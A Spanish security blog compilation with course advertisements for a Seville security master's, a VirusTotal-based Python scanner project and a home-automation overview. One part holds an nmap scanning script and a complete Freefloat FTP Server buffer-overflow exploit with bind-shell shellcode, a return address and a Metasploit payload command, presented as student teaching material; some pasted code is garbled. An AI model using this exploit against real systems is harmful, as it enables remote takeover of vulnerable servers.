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! Cómo pasa el tiempo ¡ Ya ésta aquí la tercera edición del Máster Seguridad de la Comunicaciones y la Información (#MSTIC16) donde impartiré la clase práctica de Técnicas de Hacking y Pentesting, cómo novedad este año las 5 clases que impartiré serán totalmente en el laboratorio, con ejemplo y casos prácticos donde los alumnos se enfrentaran a casos reales, aprenderán a manejar las herramientas, interpretar los resultados y resolver problemas en entorno reales.

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Si todavía necesitas más información, sigue leyendo.

[ Información General ]

El próximo curso académico la E.T.S. de Ingeniería de la Universidad de Sevilla lanzará la 3ª edición del Máster en Seguridad en las Tecnologías de la Información y las Comunicaciones.

Este título de postgrado de 66 ECTS tiene un enfoque profesional, con clases semipresenciales donde más del 50% son prácticas, y 2/3 del temario es impartido por los mejores especialistas de las empresas del sector.

En la próxima edición tan sólo se ofertarán 20 plazas, por lo que te animamos a que no dejes pasar esta oportunidad. 

Si todavía no estas plenamente convencido, podrás obtener toda la información necesaria en :



www.st2labs.com Empresa Colaboradora del Máster. @rhodius imparte con clases presenciales las técnicas de Hacking y Pentesting.

Para mi es todo un honor y un placer que @seguridadxato2 con su artículo ¿Seguridad Informática o Seguridad de la Información? [link] sea referencia en la Tesis Doctoral La enseñanza universitaria en seguridad TIC como elemento dinamizador de la cultura y la aportación de confianza en la sociedad de la información en España.

Aquí os dejo algunos datos más sobre la Tesis, y más abajo el enlace donde podéis descargarla.
  • Autor: Jorge Ramió Aguirre
  • Fecha: 22 de abril de 2014 (actualización pública de la tesis leída el 12/12/2013)
  • Formato: PDF (220 páginas)
  • Resumen: La tesis, a modo de libro blanco, hace un repaso de los últimos 25 años en la enseñanza y la difusión de la seguridad de la información en España. Se profundiza en la oferta de grado y posgrado de nuestras universidades, presentando los cambios acaecidos desde el primer informe sobre perfiles de asignaturas escrito en 1999 por el mismo autor y Dña. Pino Caballero Gil. Se analiza la situación de la enseñanza universitaria de la seguridad mediante un mapa completo de asignaturas de grado y títulos de posgrado a través de Google Maps actualizado al año 2013, lo que permite aventurar el rumbo que podría seguir esta formación en los años venideros.
  • Proyecto MESI: Los datos geográficos relativos a la oferta docente universitaria relacionada con la seguridad de la información en España, tanto de grado como de posgrado, puede encontrarlos en la página web del proyecto MESI Mapa de Enseñanza de la Seguridad de la Información.






Muchas Gracias, Jorge Ramió

#ST2Labs
www.st2labs.com


Continuamos con la tercera y ultima entrega del trabajo trabajo sobre python como lenguaje de Ataque y Defensa, realizado por Fernando Crespo Ingeniero de Telecomunicaciones como proyecto fin del Curso Experto Seguridad TIC. Ahora convertido en Máster de Seguridad TIC.

INDICE

Como ya os contaba en el artículo anterior Fernando decidió realizar un trabajo sobre de Hacking tras finalizar el Curso Exp, y decidió aplicar y ampliar algunos de los conceptos adquiridos en el modulo de Hacking y pentesting impartido por mi (@rhodius - @ST2Labs - @seguridadparatodos), ahora convertido en un Máster de Seguridad TIC (+Info).

Hemos visto que Python puede convertirse en una potentísima suite para hacking con su fácil integración con poderosas herramientas como nmap y exploitdb. Pero, ¿podemos defendernos también con Python? La respuesta es que sí. Ya se ha mencionado que una de las mayores ventajas de Python es la enorme cantidad de librerías que posee y su integración con APIs de terceros.

Así, puede ser usado cómo herramienta de análisis forense (extracción de metadatos, extracción de datos del registro de Windows, bases de datos sqlite, etc.) según se propone en [O’Connor, 2012], o firewalls (https://pypi.python.org/pypi/firewall) pero no es la única forma de defenderse con Python.

En esta sección mostraré cómo implementar la API de VirusTotal con la que se ha construido un antivirus con funcionalidad de escaneo de directorios y capacidad para generar reportes en texto y excel. Empezaremos introduciendo al lector en VirusTotal, su historia y el modo de empleo habitual.

Introducción a VirusTotal. Un poco de historia

VirusTotal [https://www.virustotal.com, 2013] es un servicio online gratuito que realiza análisis de virus en ficheros de hasta 64MB comparándolo con 46 sistemas diferentes de antivirus. También permite escaneo de urls sospechosas aunque en el scanner desarrollado en python para este trabajo sólo se hará de ficheros.
Creado por la empresa malagueña Hispasec Sistemas, en 2007 fue seleccionado por PC World como uno de los mejores 100 productos. Su éxito lo llevó a que fuera adquirido por Google en 2012.

La API de VirusTotal. Implementación con Python

La API de VirusTotal (https://www.virustotal.com/es/documentation/public-api/) permite la creación de scripts para acceder a la información recogida por VirusTotal de los 46 motores de antivirus. El formato de las peticiones es HTTP(S) POST y las respuestas tienen formato JSON. Se permiten hasta cuatro peticiones (escaneo, re-escaneo, o recoger informe) por minuto (a menos que se vaya a aportar recursos a VirusTotal y no sólo recoger los informes).

La API es gratuita y para empezar a usarla hay que registrarse en la VirusTotal Community y al crear la cuenta tendremos una clave con la que podremos implementar la API.

VirusTotal Python Scanner (vtps). Un antivirus en Python

En este apartado mostraremos al lector la estructura, código fuente y modo de uso de VirusTotal Python Scanner, el antivirus creado para este proyecto. Cómo ya se ha comentado, para implementar la API además de la clave que obtenemos al registrarnos, necesitamos el host y la url para escanear, re-escanear y solicitar resultados (en la documentación de la API puede consultarse). Dado que se recomienda no
hacer scanning de archivos ya escaneados (el re-escaneo se hace sobre el hash del fichero, no sobre éste entero), guardaremos éstos últimos en un fichero (hará de base de datos), de forma que si ya se escaneó, sólo permitirá un re-escaneo o la solicitud de informes. Toda esta configuración más la necesaria para generar logs y la localización de la base de datos, es almacenada en un fichero xml y contrastada con un esquema.

Es por ello que lo primero que necesitamos es una clase para parsear XML, la cual se encuentra en textitxmlreader.py, otra para guardar la configuración, config.py y otra para crear los logs (vtpslogger.py). Por otro lado, los métodos para guardar y obtener información de la base de datos (fichero con formato JSON), usaremos database.py y target.py.

Por otro lado, las funciones propias del antivirus las encontraremos en scan.py, scanningwd.py (modo de escaneo en el que se observa una carpeta hasta que un fichero nuevo es creado en ella), rescan.py y report.py. Éstos llamarán a los métodos de la API encapsulados en vtapi.py que realizará los HTTP POST a VirusTotal mediante postlib.py (éste fichero hay que descagárselo de la página).

Para presentar un un simple menú de las acciones a realizar se ha creado menu.py. Elscript que carga toda la configuración inicial y llama a las clases anteriores es vtps.py. El contenido de los ficheros de configuración y el código fuente del programa puede verse en el Anexo I.

Ejemplos de uso

En esta sección se muestra distintos modos de empleo del programa creado, el escaneo simple y en modo watchdog, el re-escaneo y la generación de informes en texto y excel.

Menú de opciones

Tras ejecutar vtps.py se mostrará un menú con las opciones a elegir tal y como muestra la siguiente ilustración. La primera es para un escaneo del fichero, la segunda para el modo wathdog, la tercera para hacer un re-escaneo, las opciones cuarta y quinta son para la obtención de informes en textto y excel (respectivamente) y la última para salir del menú.

Ejemplo - VirtusTotal con python.

Escaneo simple, watchdog y re-escaneo

Para hacer un escaneo sólo es necesario que el fichero no haya sido escaneado antes (no debe estar en la base de datos). Si en el menú anterior elegimos la primera opción, nos pedirá un nombre de fichero o directorio. En este caso, debemos elegir un fichero para que no nos devuelva un error (no se hace un escaneo simple de un directorio). Para hacer la prueba usaré un troyano que he descargado de una web que contiene virus para descargar y probar: http://vx.netlux.org

Ejemplo - Escanear archivo con virtustotal y python
En la base de datos habrá añadido una entrada mientras hacía la correspondiente llamada a al API de VirusTotal con el fichero.


Si ahora elegimos el modo watchdog, Vtps se quedará esperando nuevos ficheros en ese directorio.

Ejemplo - VirusTotal con python
Si probamos con el mismo troyano con otro nombre, detectará que ese fichero ya fue escaneado por que tiene el mismo hash que el escaneado anteriormente (al cotejarlo con la base de datos) y nos dirá que o bien re-escaneemos (no actualiza la base de datos) o bien solicitemos un informe. Si probamos con otro fichero hará el escaneo y lo añadirá a la base de datos.


En la base de datos del nuevo fichero aparece:


Para hacer un re-escaneo, seleccionamos la opción tres. Si el fichero no ha sido previamente escaneado (no está en la base de datos) dará error (si no existe también aunque no se muestra aquí). Hay que aclarar que lo que busca no es el nombre del fichero, sino su hash. De hecho, si probamos con el troyano con otro nombre:

Ejemplo - VirusTotal con python - rescan
Generación de informes en texto y xls

Cuando se seleccionan las opciones 4 y 5 se solicita al usuario el nombre del ficherodel que se quiere obtener un informe. Vtps buscará su hash en la base de datos y si lo encuentra realizará la llamada a la API de VirusTotal para generar informes que contendrá el análisis de 46 sistemas de antivirus. Una vez obtenido el resultado (JSON), Vtps lo transformará en un fichero de texto o xls (Microsoft Excel) según la opción elegida.

Ejemplo - VirusTotal generación informes
En la carpeta reports se habrá creado un fichero con nombre la fecha y la hora de la solicitud del informe y extensión .txt. La siguiente captura muestra algunos de los resultados obtenidos

Ejemplo - VirusTotal reporting text python
Ahora probamos el reporte en excel:

Ejemplo - VirusTotal exportando a Excel

Hasta aquí! el artículo espero que os haya gustado.
Si alguien quiere el documento completo puede ponerse en contacto a través de info@seguridadparatodos.es

#ST2Labs
@st2labs

Continuamos con la segunda entrega del trabajo trabajo sobre python como lenguaje de Ataque y Defensa, realizado por Fernando Crespo Ingeniero de Telecomunicaciones como proyecto fin del Curso Experto Seguridad TIC. Ahora convertido en Máster de Seguridad TIC.

Como ya os contaba en el artículo anterior Fernando decidió realizar un trabajo sobre de Hacking tras finalizar el Curso Exp, y decidió aplicar y ampliar algunos de los conceptos adquiridos en el modulo de Hacking y pentesting impartido por mi (@rhodius - @ST2Labs - @seguridadparatodos), ahora convertido en un Máster de Seguridad TIC (+Info).

En esta segunda parte Fernando entra en materia para explotar una vulnerabilidad conocida utilizando para ello python, modificará un exploit conocido escrito en python para agregarle un nuevo shellcode.

INDICE

2.2.1. Scanning de puertos: integración con nmap

Para instalar el módulo nmap basta con usar easy-install (un programa que instala librerías de Python) como sigue:
$easy_install python-nmap
Así, un script sencillo que escanee puertos usando la librería de nmap para Python sería como sigue:

Script NMAP python


Texto:
import optparse, nmap
class NmapScanner:
     def __init__(self): self.nmsc = nmap.PortScanner()

    def nmapScan(self, host, port): 
          self.nmsc.scan(host, port) 
          self.state = self.nmsc[host][’tcp’][int(port)][’state’] 
          print " [+] "+ host + " tcp/" + port + " " + self.state

def main():

parser = optparse.OptionParser("usage%prog " + "-H <target host> -p <target port>") 
parser.add_option(’-H’, dest = ’host’, type = ’string’, help = ’Please, specify the target host.’)
parser.add_option(’-p’, dest = ’ports’, type = ’string’, help = ’Please, specify the target port(s) separated by comma.’) (options, args) = parser.parse_args() if (options.host == None) | (options.ports == None): print ’[-] You must specify a target host and a target port(s).’ exit(0) host = options.host ports = options.ports.split(’,’)

 for port in ports: 
NmapScanner().nmapScan(host, port)

if __name__ == "__main__": 
   main()
--Cut here --

Ejecutamos nuestro script y el resultado es el siguiente tras escanear un equipo:

$ python nmapScanner.py -H 192.168.1.138 -p 21,22,23,80,443 [+] 192.168.1.138 tcp/21 closed [+] 192.168.1.138 tcp/22 open [+] 192.168.1.138 tcp/23 closed [+] 192.168.1.138 tcp/80 open [+] 192.168.1.138 tcp/443 closed
2.2.2. Creación de exploits, Python y exploitdn

Para este caso, vamos a aprovechar una vulnerabilidad conocida en el servidor FTP Free Float FTP Server para Windows XP SP 3. Usaremos exploitdb integrado en BackTrack 5 R3 para ver un exploit en Python que manipularemos para provocar un Buffer overflow en la máquina de la víctima abriendo el puerto TCP 4444 con el que conseguiremos conectarnos a su máquina por telnet.

Primero de todo en el sistema del atacante vamos a exploitdb y ejecutamos como sigue:

Description ----------------------------------------------
Freefloat FTP Server Buffer Overflow Vulnerability 0day
----------------------------------------------
Path ------------------------ /windows/remote/15689.py

Ya tenemos nuestro exploit en Python. Pero tenemos que adaptarlo a nuestro sistema. Todo exploit trata de sobreescribir el registro EIP (Extended Instruction Pointer) con instrucciones como JMP ESP o CALL ESP. En sistemas operativos como XP hay ciertas DLL que tienen algunas de estas instrucciones en una dirección de memoria fija (no usan ASLR). 

Nosotros buscaremos la instrucción JMP ESP en la librería KERNEL32.DLL, para lo cual nos apoyaremos en un programa llamado findjmp.exe que ejecutaremos en el equipo víctima (en un ataque real habría que probar con varias direcciones conocidas que pueden variar en función de la versión del sistema operativo y el idioma).

La siguiente figura muestra cómo ejecutar este programa para encontrar la dirección de JMP ESP:

FindJMP dirección JMP en KERNEL32.DLL WindowsXP SP3
Ahora modificamos el script que lanza el shellcode con la nueva dirección obtenida. El shellcode es código máquina en hexadecimal que abrirá el puerto en la máquina de la víctima. Para ubicarlo en la zona de memoria primero hay que provocar el buffer overflow con una secuencia de caracteres cuya longitud puede calcularse con ayuda de metasploit. Efectivamente, probamos con una cantidad de bytes lo suficientemente elevada que provoque un buffer overflow. Con dicha cantidad usamos un script en Ruby llamado pattern_create.rb.

Con ese patrón volvemos a lanzar el shellcode ejecutándo el servidor FTP con un debugger como ollydbg o immunitydebugger observamos lo que se ha escrito en el EIP y el ESP. Usando estos valores con el script pattern_offset.rb tendremos el offset exacto para sobreescribir EIP y ESP.

Además, otro script importante es Mona.py que genera una secuencia de caracteres entre \x00 y \xff . Con esa secuencia, dependiendo de como hayamos sobreescrito ESP, podemos averiguar si hay algunos caracteres raros que no se ejecutarán en la máquina víctima.

Así el creador del script le puede indicar a metasploit que le genere el shellcode sin esos carácteres raros:

# msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b "CARACTERES RAROS" -t c
Con estos elementos el atacante ya tiene su script:

Texto
# Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
 # Date: 12/05/2010 
# Author: 0v3r 
# Software Link:
 # http://www.freefloat.com/software/freefloatftpserver.zip 
# Tested on: Windows XP SP3 EN 
# CVE: N/A
#!/usr/bin/python

import socket 
import sys

def usage():
     print "usage : ./freefloatftp.py <victim_ip> <victim_port>" 
     print "example: ./freefloatftp.py 192.168.1.100 21"

#Bind Shell shellcode port 4444 

shellcode = 
("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4" "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c" "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07" "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07" "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e" "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f" "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38" "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65" "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a" "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74" "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5" "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80" "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4" "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80" "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82" "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a" "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70" "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6" "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4" "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6" "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4" "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53" "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84" "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51" 
"\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")

junk1 = "\x41" * 230 
eip = "\x7B\x46\x86\x7C" #7C86467B JMP ESP (findjmp.exe): 
nops = "\x90" * 16 
junk2 = "\x43" * (1000 - len(junk1 + eip + nops + shellcode)) 
buff = junk1 + eip + nops + shellcode + junk2 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "\n" 
print "----------------------------------------------------" 
print "|Freefloat FTP Server Buffer Overflow Vulnerability|" 
print "----------------------------------------------------" 
print "\n"

if len(sys.argv) != 3: 
    usage() 
    sys.exit()

ip = sys.argv[1] 
port = sys.argv[2]

try: 
print("[-] Connecting to " + ip + " on port " + port + "\n") s.connect((ip,int(port))) data = s.recv(1024)       print("[-] Sending exploit...") s.send(’USER ’ + buff + ’\r\n’) s.close() print("[-] Exploit successfully sent...") print("[-] Connect to " + ip + " on port 4444") 

except: 
   print("[-] Connection error...") 
   print("[-] Check if victim is up.")

-- cut Here --

Ejecutamos el script pasando como argumentos la IP de la víctima y el puerto en el que está escuchando el servidor. El resultado se muestra en la siguiente figura:

Testing exploit - Shell Remota
Esto es todo con respecto a la utilización de python como herramienta de ataque (Hacking), en la ultima entrega Fernando nos hablará de como usar python como Defensa, pero esto será en el próximo artículo.

Un Saludo.
#ST2Labs

Tengo el enorme placer de presentaros el Máster en Seguridad TIC, en el que seguiré dando clase en las Técnicas de Hacking y Pentesting. El máster es la evolución natural del Curso Exp. Universitario en Seguridad TIC que se ha impartido con un rotundo éxito, durante los meses que van de Febrero a Junio 2013, con una nota media de satisfacción en el curso de 4,06 sobre 5, y de 4,42/5 en el profesorado.

¿Qué se tiene preparado para el año que viene?

Formación Flexible

Se puede cursar el Máster por cursos, sobre todo esta pensado para adaptarse a todos los bolsillo (se disponen de 2 becas del 50% del coste). Para obtener el titulo de Máster se deberán de cursar los dos Cursos Exp. Universitario más la realización del Trabajo fin de Máster.


  • Base: Diploma Universitario de Especialista en Seguridad TIC (2 edición)
  • Avanzado: Diploma Universitario de Especialista en Seguridad TIC nivel Avanzado
  • Trabajo Fin de Máster.


Curso Base: Diploma Universitario Especialista en Seguridad TIC

Este curso se corresponde con la segunda edición del Curso Exp. Universitario Seguridad TIC, con la novedades siguientes:

  • El curso tiene 30 créditos ECTS semipresenciales (con 118 horas presenciales). 
  • Las clases presenciales se realizan los viernes (4:30-8:30) y sábados (9:30-13:30) entre Octubre y Enero (incluidos).
  • A la finalización se obtiene un Diploma de Especialista en Seguridad TIC (Titulación Oficial).
Contenido y profesorado:

Contenido del Curso Base - Diploma Especialista Seguridad TIC

¿Donde y cuando se imparte?

En Sevilla. En la Escuela Superior de Ingenieros (C/ Camino de los descubrimientos s/n. Isla de la Cartuja). Entre el 2 de Octubre de 2014 y el 31 enero de 2014 (fechas orientativas).
Admisión y Matricula

Es necesario estar en posesión de algún titulo universitario (graduado o equivalente o superior) preferentemente en ingeniería. 
  • Coste del Curso: 1.696€ (se Ofrecen 2 Becas con reducción del 50%)
  • Preinscripción y matrícula entre el 1 y el 20 de Septiembre de 2013 . 
  • Se ofertan 18 plazas.
Curso Avanzado: Diploma Universitario Especialista en Seguridad TIC nivel Avanzado

Es un curso avanzado para perfeccionar lo aprendido en el curso Base y adquirir nuevos conocimientos de nivel avanzado, además:

  • El curso tiene 30 créditos ECTS (con 98 horas presenciales en los módulos 1-5).
  • Las clases presenciales se realizan los viernes (4:30-8:30) y sábados (9:30-13:30) entre Febrero y Mayo (incluidos).
  • A la finalización se obtiene un Diploma de Especialista en Seguridad TIC nivel Avanzado (Titulación Oficial).
Contenido y profesorado:

Contenido Curso Avanzado - Diploma Especialista Seguridad TIC nivel Avanzado.

¿Donde y cuando se imparte?

En Sevilla. En la Escuela Superior de Ingenieros (C/ Camino de los descubrimientos s/n. Isla de la Cartuja). Entre el 2 de Febrero de 2014 y el 31 Mayo de 2014 (fechas orientativas).

Admisión y Matricula

Es necesario haber superado el 60% del título de Experto en Seguridad (nivel básico), o equivalente (a evaluar por comisión académica). Plazo de matrícula
  • Coste del Curso: 1.696€ (se Ofrecen 2 Becas con reducción del 50%)
  • Preinscripción y matrícula entre el 1-20 de enero de 2014.
  • Solamente 18 plazas. 

Novedad: 

Si. Tiene como requisito hacer 70h de prácticas en una de las empresas colaboradoras. El 56% de las clases se imparte en Laboratorios de la ESI.

Titulación Oficial de Máster en Seguridad TIC

Para ello se debe de cursar el Trabajo Fin de Máster, ello consiste en un trabajo académicamente dirigido por el profesorado del Máster. El trabajo tiene asignados 6 créditos ECTS (unas 150 horas de trabajo total) y no tiene clases presenciales excepto las sesiones de seguimiento que acuerden cada alumno y su tutor. La finalización existosa del trabajo otorga el título de Máster.

Admisión y matrícula

El requisito es la matriculación conjunta con el curso de nivel avanzado, que comparten idénticos requisitos. (véase el apartado superior).

  • Coste del Trabajo Fin de Máster: 345€
  • Preinscripción y matrícula entre el 1 y el 20 de Enero de 2014 . 
  • Se ofertan 18 plazas.
!! No os lo podéis perder ¡¡ Tanto para profesionales que deseen perfeccionar sus conocimientos como para aquellos que desean incorporarse al mundo laboral con fuertes nociones en Seguridad de la Información.

Orientación Profesional

Impartido por profesionales del sector, pertenecientes a:



Las técnicas de Hacking y Pentesting son impartidas por mi gracias a @st2labs (www.st2labs.com).

#No olvides compartirlo en las redes sociales | Ayúdanos a llegar al mayor número de personas.
Gracias.
El Curso Experto universitario es el único curso oficial de postgrado en Seguridad TIC de Andalucía, con tan solo 25 plazas, es una oportunidad para todos aquellos que estén pensando en trabajar en Seguridad de la Información.

Si están pensando en trabajar en Seguridad de la Información, y resides en Andalucía, no los dudes! El curso te capacitará y preparará para trabajar con garantías en el campo de la Seguridad de la Información.


DATOS DEL CURSO

Se impartirá de Febrero a Mayo del 2013, Viernes tarde y sábados mañana en horario de 16:00 - 20:00, y 9:30 - 13:30 respectivamente.
Profesorado
Módulos y Contenido
 (English version)
Fecha Preinscripción:Del 01/10/2012 al 20/11/2012
(consultar requisitos y procedimiento de preinscripción y matriculación)
Matriculación:Del 01/11/2012 al 20/11/2012 (Sólo 25 plazas)
Precio:1.839,00 (tasas incluidas). Existen 4 becas del 50%
Departamento Organizador:Ingeniería Telemática, Universidad de Sevilla. (Centro de Formación Permante)
Contacto:954487384 ,  expertoseguridadtic@trajano.us.es


¿Por qué elegir este curso de posgrado y no otro?

El curso propuesto tiene un claro perfil profesional, alejado de enfoques excesivamente teóricos o de investigación que ofrecen otros títulos Universitario. Las horas de clases impartidas por reputados expertos del sector son más del 60% del total, y por las prácticas obligatorias en empresa.

Formato del Curso

El formato elegido, título de Experto Universitario de 30 ECTS, (equivalente a 1/2 master) y en modalidad semi-presencial, viernes tarde y sábados por la mañana, permite a los profesionales del sector TIC (ingenieros e ingenieros técnicos de telecomunicación e informática) realizar una apuesta hacia el campo de la seguridad con una inversión de recursos (tiempo y dinero) menor que en el caso de los Master, a los que tendrá acceso en el futuras ediciones. Es el único curso oficial de posgrado dedicado a Seguridad TIC que se oferta en las Universidades Públicas Andaluzas.

Seguridad TIC un mercado con potencial de crecimiento

La seguridad es uno de los campos de trabajo más importantes y de mayor proyección en el ámbito de las tecnologías de la información y las comunicaciones (TIC). 

Según el estudio de TB-Security, en el año 2012 el sector de la Seguridad Informática en España alcanzará un volumen cercano a los 1.700 millones de euros frente a los 970 millones de 2008. Estas cifras sitúan al segmento de la Seguridad Informática como uno de los motores del crecimiento del sector TI en España. Por áreas, este mismo estudio, y en línea con informes anteriores como el del mercado de la seguridad TIC de INTECO, señala que serán los servicios los que continuen incrementando su cuota de participación dentro de la seguridad, alcanzando en 2012 hasta un 65% del total del mercado, frente al software y al hardware. 

Esta gran demanda de profesionales por parte del mercado se está viendo reflejada en un aumento constante de la oferta formativa en seguridad TIC a nivel de títulos de Máster y Experto universitario.

Por ultimo, y más interesante ¿Donde podrás trabajar?

El mercado potencial de los alumnos que lo terminen se sitúa en dos posibles tipos de empresas: 

a) Empresas del sector TIC que ejercen de consultoras en seguridad TIC, como pueden ser Accenture, PwC, ISDEFE, Telefónica, Wellness Telecom, Sainco, Sadesi, Sandetel, Hispasec, ENEO, ... 

b) Grandes empresas internacionales e incluso la administración pública.

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La domótica es un conjunto de sistemas capaces de automatizar una vivienda, aportando servicios de gestión energética, seguridad, bienestar y comunicación, y que pueden estar integrados por medio de redes interiores y exteriores de comunicación, cableadas o inalámbricas, y cuyo control goza de cierta ubicuidad, desde dentro y fuera del hogar. Se podría definir como la integración de la tecnología en el diseño inteligente de un recinto cerrado.

Por supuesto, cómo todo aquello que tiene relación con el mundo "CIS" (sistemas de información y comunicación), esta sujeto a unas amenazas similares. Todo software, sea en la forma que sea, puede contener errores de programación que den lugar a vulnerabilidades, y deben de estar sujetos a políticas de actualización y mantenimiento. En la domótica, concurrente múltiples sistemas de información, desde software de gestión (local o remota), hasta sistema de control de los elementos que se basan en equipamiento hardware que emite las señales y maneja adecuadamente los elementos que controlan.

Del mismo modo que se estudia la seguridad en otros entornos, la domótica no esta exenta de amenazas y riesgos de seguridad, del mismo modo que se estudia y analiza la seguridad de un Sistemas de control ferroviario, se puede abordar la seguridad de un sistema de control doméstico que en lugar de gestionar los elementos de transporte, pueden controlar la temperatura de la casa, las persianas o incluso el control energético del hogar.

Opendomo, es un proyecto "open source" que estudia la seguridad en los entornos domóticos y proporciona un entorno de desarrollo para crear sistemas domóticos personalizados, a continuación entraremos en detalle sobre el proyecto.


¿Qué es Opendomo?


Es un proyecto libre que pretende crear un sistema de control domótico accesible y seguro. La licencia bajo la que se está desarrollando el proyecto es la Licencia Pública General (GPL.) . Esta licencia garantiza la libertad en el uso del software, uno de los principales valores de la sociedad tecnológica actual. En términos generales, esto implica que OpenDomo puede ser usado, copiado, modificado y distribuido libremente.

Es una plataforma para Hogares Inteligentes basada en software libre y dispositivos estandarizados, que se diferencia de los productos "propietarios" por el principio de innovación abierta, y por un nivel de costes muy inferior.

Hoy en día, consideramos que el hogar inteligente (desde el punto de la sostenibilidad, ahorro, seguridad y accesibilidad) ya no es puede considerarse un lujo, si no que se pude llegar a convertir en una necesidad.

Funcionalidades


Componentes

Los componentes fundamentales de OpenDomo, son ODNetwork o ODControl:

ODNetwork 

Es un completo ordenador diseñado para el control doméstico, tanto para domótica IP como videovigilancia. Consiste en un ordenador de bajo consumo, silencioso y de muy reducidas dimensiones con la última versión estable de OpenDomo, especialmente compilada y configurada para su óptimo funcionamiento en esta plataforma. Basta con un único ODNetwork puede controlar todos los elementos de un sistema OpenDomo. 




ODControl

Es el controlador IP de OpenDomo, que actúa sobre elementos eléctricos y conocer el estado de sensores a través de la red, accediendo a él desde un ordenador o smartphone gracias a su interfaz web. Una de sus principales características es la versatilidad, que le permite adaptarse a cualquier uso que se le quiera dar.





Próximamente lanzarán un nuevo elemento ODEnergy, que estará especialmente destinado al control energético del hogar.

Conclusiones

Una excelente iniciativa que permite llevar la domótica prácticamente a cualquier hogar, consiguiendo los objetivos fundamentales de "bajo coste", "accesibilidad" y "seguridad".

Por lo tanto, si estas pensando en realizar un proyecto de domótica en tu hogar, quizás te interese profundizar en Opendomo, y como su kit de desarrollo, además de sus manuales y tutoriales te sirve como soporte y ayuda en tu objetivo.